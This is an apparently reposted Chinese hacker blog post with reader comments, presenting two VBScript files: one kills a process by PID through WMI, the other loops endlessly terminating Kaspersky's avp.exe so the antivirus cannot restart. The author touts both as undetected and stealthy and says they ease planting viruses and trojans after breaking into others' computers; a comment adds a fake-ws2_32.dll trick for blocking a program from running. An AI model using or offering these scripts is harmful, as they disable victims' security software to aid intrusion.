今天下午沒(méi)課����,躲進(jìn)私人空間開始思考些問(wèn)題����。在瀏覽VBS相關(guān)案例時(shí)�,自己寫了兩個(gè)小程序出來(lái)�����,有Hack性質(zhì)的(其實(shí)只要能“借刀殺人”�����,什么軟件沒(méi)黑客性質(zhì)�����?- -!)�����。Kill.vbs用來(lái)在cmd下結(jié)束進(jìn)程�����,Dis.vbs用來(lái)在窗口模式下防止某進(jìn)程再次啟動(dòng)�。這兩個(gè)VBS都不會(huì)被殺毒軟件KILL掉,并且有一定的隱蔽性……看代碼?����。?為注釋)
Kill.vbs:
復(fù)制代碼 代碼如下:
for each ps in getobject _
("winmgmts:\\.\root\cimv2:win32_process").instances_ '涉及到WMI腳本入侵技術(shù)�����,我不能解釋清楚�!
if ps.handle=wscript.arguments(0) then '判斷進(jìn)程的PID號(hào)是否與獲得的PID號(hào)參數(shù)相等
wscript.echo ps.terminate '如果相等就結(jié)束指定PID號(hào)對(duì)應(yīng)的進(jìn)程
end if
next
Dis.vbs
復(fù)制代碼 代碼如下:
dim y,x '不要這行也行……
do '來(lái)個(gè)死循環(huán)……一直在判斷!do ... loop內(nèi)為循環(huán)體���!
set y=getobject("winmgmts:\\.\root\cimv2") '和上面解釋一樣���,這也是涉及到微軟的WMI技術(shù)!
set x=y.execquery("select * from win32_process where name='avp.exe'")
'查詢語(yǔ)句�,where后判斷avp.exe(卡巴)是否存在進(jìn)程中!
'這樣當(dāng)卡巴被上面的Kill.vbs結(jié)束時(shí)就再也啟動(dòng)不起來(lái)了����。除非,把Dis.vbs結(jié)束了先……
for each i in x
i.terminate() '卡巴要啟動(dòng)馬上就終止……
next
wscript.sleep
loop
解釋夠清楚了�,那就來(lái)看看這兩個(gè)vbs是如何工作的吧。我將Kill.vbs與Dis.vbs放在C盤根目錄下�。
打開cmd,輸入cd\回到C盤根目錄下�,輸入tasklist查看當(dāng)前系統(tǒng)的進(jìn)程情況����,然后記下你想kill的進(jìn)程的PID號(hào)�����,輸入cscript Kill.vbs 2200即可結(jié)束PID為2200的進(jìn)程了�����!假如這個(gè)進(jìn)程是avp.exe��,那你就可以輸入Dis.vbs啟動(dòng)Dis.vbs來(lái)防止卡巴繼續(xù)被啟動(dòng)���。Dis.vbs啟動(dòng)時(shí)僅在任務(wù)管理器的進(jìn)程中有wscript.exe進(jìn)程項(xiàng)��,要是不結(jié)束這個(gè)進(jìn)程是無(wú)法再次啟動(dòng)卡巴的����。
懂得這些�,為以后入侵他人電腦后上傳病毒、木馬之類的就更方便了一點(diǎn)點(diǎn)……上面的所有過(guò)程都經(jīng)本人試驗(yàn)成功了����,繼續(xù)完善……
復(fù)制代碼 代碼如下:
ws2_32.dll
在程序目錄里建立這個(gè)也能組織程序運(yùn)行
Greysign - 2007-03-20 19:01 阻止.
ycosxhack - 2007-03-20 19:15
我暈了����,果然?����?��!建立個(gè)記事本改名為ws2_32.dll,就……好��,記下啦�����!呵呵……
Greysign - 2007-03-20 21:21
運(yùn)行程序會(huì)在WINDOWS目錄尋找這個(gè)接口文件.但是會(huì)先在程序目錄先搜索一遍
ycosxhack - 2007-03-20 21:43
接口文件�?你的意思是:任何程序都必須尋找它了?調(diào)用這個(gè)庫(kù)文件吧���?刪了它就真正麻煩了……
Greysign - 2007-03-20 22:37 嗯.
轉(zhuǎn):http://hi.baidu.com/ycosxhack/blog/item/779281359f25908aa71e12e9.html
